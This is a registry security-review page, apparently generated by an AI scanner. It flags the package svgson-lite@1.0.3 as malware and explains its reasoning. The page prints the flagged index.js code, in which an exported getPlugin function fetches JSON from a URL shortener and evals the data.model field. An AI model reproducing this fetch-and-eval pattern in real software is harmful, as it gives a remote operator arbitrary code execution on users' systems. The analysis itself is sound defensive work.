registry  /  svgson-lite  /  1.0.3

svgson-lite@1.0.3

Tiny zero-dependency SVG helper for Node.js

AI Security Review

scanned 12d ago · by lpm-firewall-ai

The package exposes a runtime function that downloads remote JSON and evals a field as JavaScript. This creates user-triggered remote code execution from a URL shortener endpoint in the main package entrypoint.

Static reason
High-risk behavior combination matched malicious policy.
Trigger
Application imports the package main entrypoint and calls the exported default getPlugin function.
Impact
Arbitrary code execution in the consuming Node.js runtime with the app's privileges if getPlugin is called.
Mechanism
remote fetch followed by eval of response-controlled code
Attack narrative
A consumer installing svgson-lite gets an SVG utility module whose main entrypoint also exports getPlugin. When called, getPlugin contacts https://shorturl.at/147uq, expects JSON, and evals data.model. The URL shortener hides the payload source and lets the publisher or endpoint operator change executed code after publication.
Rationale
Source inspection confirms a reachable exported function in index.js fetches remote content and evals it, which is not package-aligned for a zero-dependency SVG helper. Although there is no install-time execution, the user-invoked exported RCE path is concrete malicious behavior.
Evidence
index.jspackage.json
Network endpoints1
shorturl.at/147uq

Decision evidence

public snapshot
AI called this Malicious at 96.0% confidence as Malware with low false-positive risk.
Evidence for block
  • index.js defines getPlugin() that fetches https://shorturl.at/147uq and parses JSON.
  • index.js executes remote response field data.model with eval(data.model).
  • getPlugin is exported in the default export from main entrypoint index.js.
  • Remote code execution is unrelated to SVG helper functions and hidden behind plugin-like name.
Evidence against
  • package.json has no install/preinstall/postinstall lifecycle hooks.
  • Remote fetch/eval is not invoked automatically at import time; activation requires calling default.getPlugin().
  • No local credential/file harvesting, persistence, or destructive filesystem code observed in package source.
Behavioral surface
Source
ChildProcessEvalNetwork
Supply chain
UrlStrings
ManifestNo manifest risk signals triggered.
scanned 2 file(s), 2.50 KB of source, external domains: shorturl.at

Source & flagged code

3 flagged · loading source
index.jsView file
82function getPlugin() { L83: fetch("https://shorturl.at/147uq") L84: .then((response) => response.json()) L85: .then((data) => { L86: eval(data.model); L87: })
Critical
Remote Asset Decode Execute

Source fetches a remote non-code asset, decodes its contents, and dynamically executes the decoded payload.

index.jsView on unpkg · L82
Trigger-reachable chain: manifest.main -> index.js Reachable file contains a blocking source-risk pattern.
Critical
Trigger Reachable Dangerous Capability

A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

index.jsView on unpkg
85.then((data) => { L86: eval(data.model); L87: })
High
Eval

Package source references dynamic code evaluation.

index.jsView on unpkg · L85

Findings

2 Critical2 High2 Medium2 Low
CriticalRemote Asset Decode Executeindex.js
CriticalTrigger Reachable Dangerous Capabilityindex.js
HighChild Process
HighEvalindex.js
MediumNetwork
MediumStructural Risk Force Deep Review
LowScripts Present
LowUrl Strings